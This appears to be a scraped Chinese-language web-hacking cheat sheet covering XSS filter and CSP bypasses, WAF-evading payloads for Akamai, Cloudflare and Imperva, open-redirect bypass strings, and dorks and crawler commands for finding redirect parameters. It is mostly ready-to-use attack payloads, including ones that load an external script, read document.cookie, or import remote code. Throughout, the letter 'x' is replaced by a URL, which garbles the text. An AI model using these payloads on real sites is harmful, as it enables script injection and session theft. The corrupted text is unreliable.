XSS
- 测试不同编码方式并检查是否存在任何奇怪的行为
- <"&#https://cloud.tencent.com/developer/article/x27;`--!>
- 如果反应为< < --> 测试双重编码
- https://github.com/InfoSecOne/ghettoBypass
- https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
- 逆向工程开发者的思维
CSP
- CSP审查工具
1.
2. mitsecXSS">
3. “><img src onerror=document.body.appendChild(Object.assign(document.createElement(&#https://cloud.tencent.com/developer/article/x27;script&#https://cloud.tencent.com/developer/article/x27;),{src:&#https://cloud.tencent.com/developer/article/x27;https:&#https://cloud.tencent.com/developer/article/x27;.concat(String.fromCharCode(47)).concat(String.fromCharCode(47)).concat(&#https://cloud.tencent.com/developer/article/x27;ehttps://cloud.tencent.com/developer/article/xternaljshere&#https://cloud.tencent.com/developer/article/x27;)}));>
4.
Waf
代码语言:javascript复制Akamai JSi
&#https://cloud.tencent.com/developer/article/x27;;k=&#https://cloud.tencent.com/developer/article/x27;e&#https://cloud.tencent.com/developer/article/x27;
top[&#https://cloud.tencent.com/developer/article/x27;al&#https://cloud.tencent.com/developer/article/x27; k &#https://cloud.tencent.com/developer/article/x27;rt&#https://cloud.tencent.com/developer/article/x27;](1)//
&#https://cloud.tencent.com/developer/article/x27;"><A HRef=" AutoFocus OnFocus=top/**/?.[&#https://cloud.tencent.com/developer/article/x27;ale&#https://cloud.tencent.com/developer/article/x27;+&#https://cloud.tencent.com/developer/article/x27;rt&#https://cloud.tencent.com/developer/article/x27;](document+cookie)>
CloudFlare HTMLi
<Img Src=OnXSS OnError=alert(1)>
<Img Src=OnXSS OnError=confirm(document.cookie)>
Imperva HTMLi
<Img Src=//X55.is OnLoad
=import(Src)>
工具和资源
- cheat-sheet
- Dom-https://cloud.tencent.com/developer/article/xss-burp
Referer https://cloud.tencent.com/developer/article/xss
- window.history.replaceState() 替换历史来替换referer
- https://webhook.site/
- CRLF
<body>
<a
href="https://www.marksandspencer.com.tr/cerez-politikasi?1111"
referrerpolicy="unsafe-url"
>
click me
</a>
<script>
window.history.replaceState(null,"","1.html")
</script>
</body>
Url跳转
重定向过程中会
深度利用
- windows.location: 寻找https://cloud.tencent.com/developer/article/xss
- 后端判定:寻找ssrf
bypass
代码语言:javascript复制/https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
\https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//domain.com@https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
https://https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com/domain.com
https://https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com%23.domain.com
https://https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com?c=.domain.com (# 也可以)
////https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
////https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
https://domain.computer/
https://domain.com.https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
/
/https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com( , �,
, , /)
/https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//google。com
& ? # /
google dork
代码语言:javascript复制inurl:url= | inurl:return= | inurl:return_url= | inurl:rUrl=| inurl:r_url= | inurl:nehttps://cloud.tencent.com/developer/article/xt= | inurl:cancelUrl= | inurl:goto= | inurl:follow= | inurl:returnTo= | inurl:history= | inurl:redirect= | inurl:redirectTo= | inurl:redirectUrl= | inurl:goback= | inurl:redir= | inurl:redirUrl= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:ehttps://cloud.tencent.com/developer/article/xample.com
gospider
代码语言:javascript复制gospider -w -r -a -s https://wwww.https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com | grep -E "callback|/|redirect|url=|return|rurl|r_url|nehttps://cloud.tencent.com/developer/article/xt|cancelUrl|goto|follow|returnto|history|goback|redir=|ret=|r2=|page=|jump=|target="
Waf https://cloud.tencent.com/developer/article/xss payload
代码语言:javascript复制"><img/src/onerror=import(&#https://cloud.tencent.com/developer/article/x27;//domain/&#https://cloud.tencent.com/developer/article/x27;)>"@yourdomain
013371337;ehttps://cloud.tencent.com/developer/article/xt=<img/src/onerror=import(&#https://cloud.tencent.com/developer/article/x27;//domain/&#https://cloud.tencent.com/developer/article/x27;)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2https://cloud.tencent.com/developer/article/xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert(document.cookie)>
<svg onload=alert("1")><””>
<Img Src=//X55.is OnLoad
=import(Src)>
